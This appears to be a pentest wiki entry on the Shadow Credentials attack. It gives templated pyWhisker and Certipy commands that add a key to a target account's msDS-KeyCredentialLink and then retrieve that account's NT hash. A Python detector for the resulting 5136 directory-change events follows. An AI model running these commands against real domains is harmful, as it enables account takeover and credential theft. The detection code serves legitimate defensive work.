Overview
Kerberos pre-authentication is normally done symmetrically (with a key derived from the account's password), but if PKINIT (certificate-based pre-authentication) is enabled, a certificate can be used to authenticate as a user or computer account. The msDS-KeyCredentialLink attribute holds the public key(s) that the KDC will trust for PKINIT on that account.
If you can modify the msDS-KeyCredentialLink attribute of an account, and the domain supports PKINIT for authentication, you can gain access to that account without changing its password.
Discovery
Requirements:
- PKINIT must be supported for Kerberos pre-authentication
- the ability to edit the target's msDS-KeyCredentialLink attribute
Exploitation
You can use pyWhisker to add a new key pair / certificate to the target account.
```bash
pywhisker -d [DOMAIN] -u [CONTROLLED USER] -p "[PASSWORD]" --target [TARGET ACCOUNT] --action add
```

Post-Exploitation
You can use Certipy to authenticate with the certificate and obtain the NT hash of the target account.
First, remove the password from the certificate.
```bash
certipy cert -export -pfx [CERT].pfx -password [PASSWORD] -out unprotected.pfx
```

Next, authenticate using the certificate to grab the hash.

```bash
certipy auth -pfx unprotected.pfx -dc-ip [IP] -username '[TARGET]' -domain '[DOMAIN]'
```

Resources
| Hyperlink | Info |
|---|---|
| SpecterOps | Explaining and introducing ShadowCreds/Whisker |
| Whisker | Tool for manipulating msDS-KeyCredentialLink |
| Certipy | Tool for abusing ADCS |
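Defensive counterpart to the technique above, as an added example that is not part of the original page or of pyWhisker/Certipy: the write to msDS-KeyCredentialLink performed in the exploitation step surfaces on the domain controller as Security event 5136 ("A directory service object was modified"), and this script flags such writes in a batch of constructed 5136 records, separating a principal writing its own key (Windows Hello enrollment looks like this) from another principal writing to someone else's object. It assumes "Audit Directory Service Changes" is enabled with a write SACL on the monitored objects (otherwise 5136 is never emitted), and the MSOL_ allowlist prefix is a placeholder for your own provisioning accounts.

```python
from dataclasses import dataclass

# OperationType code that 5136 uses for "Value Added" (deletions use %%14675).
VALUE_ADDED = "%%14674"
# Accounts allowed to write key credentials for other principals; placeholder prefix, tune per domain.
PROVISIONING_PREFIXES = ("MSOL_",)


@dataclass(frozen=True)
class Finding:
    subject: str      # account that performed the write
    target_dn: str    # object whose msDS-KeyCredentialLink gained a value
    self_write: bool  # True if the principal wrote to its own object


def is_self_write(subject: str, target_dn: str, target_class: str) -> bool:
    """A computer appears as NAME$ in the subject while its DN leaf is just NAME."""
    leaf = target_dn.split(",", 1)[0].split("=", 1)[1]
    expected = leaf + "$" if target_class == "computer" else leaf
    return subject.upper() == expected.upper()


def find_shadow_credential_writes(events: list[dict]) -> list[Finding]:
    """One Finding per 5136 event that added a msDS-KeyCredentialLink value."""
    out = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("OperationType") != VALUE_ADDED:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != "msds-keycredentiallink":
            continue
        subject, dn = ev["SubjectUserName"], ev["ObjectDN"]
        if subject.upper().startswith(PROVISIONING_PREFIXES):
            continue  # allowlisted provisioning account
        out.append(Finding(subject, dn, is_self_write(subject, dn, ev.get("ObjectClass", ""))))
    return out


# Constructed sample events (not real logs); field names follow the 5136 event XML.
def _ev(subject, dn, cls, attr="msDS-KeyCredentialLink", op=VALUE_ADDED):
    return {"EventID": 5136, "SubjectUserName": subject, "ObjectDN": dn, "ObjectClass": cls,
            "AttributeLDAPDisplayName": attr, "OperationType": op}

SAMPLE_EVENTS = [
    _ev("jdoe", "CN=jdoe,CN=Users,DC=corp,DC=local", "user"),                # self-enrollment
    _ev("helpdesk1", "CN=SRV01,CN=Computers,DC=corp,DC=local", "computer"),  # cross-account write
    _ev("MSOL_1a2b3c", "CN=asmith,CN=Users,DC=corp,DC=local", "user"),       # allowlisted sync account
    _ev("helpdesk1", "CN=SRV01,CN=Computers,DC=corp,DC=local", "computer", attr="description"),
]

if __name__ == "__main__":
    for f in find_shadow_credential_writes(SAMPLE_EVENTS):
        label = "self-write, verify enrollment" if f.self_write else "ALERT cross-account write"
        print(f"{label}: {f.subject} -> {f.target_dn}")
```

A cross-account finding on a computer object or a privileged user is the one to triage first; a self-write on a user object should be matched against expected Windows Hello enrollments.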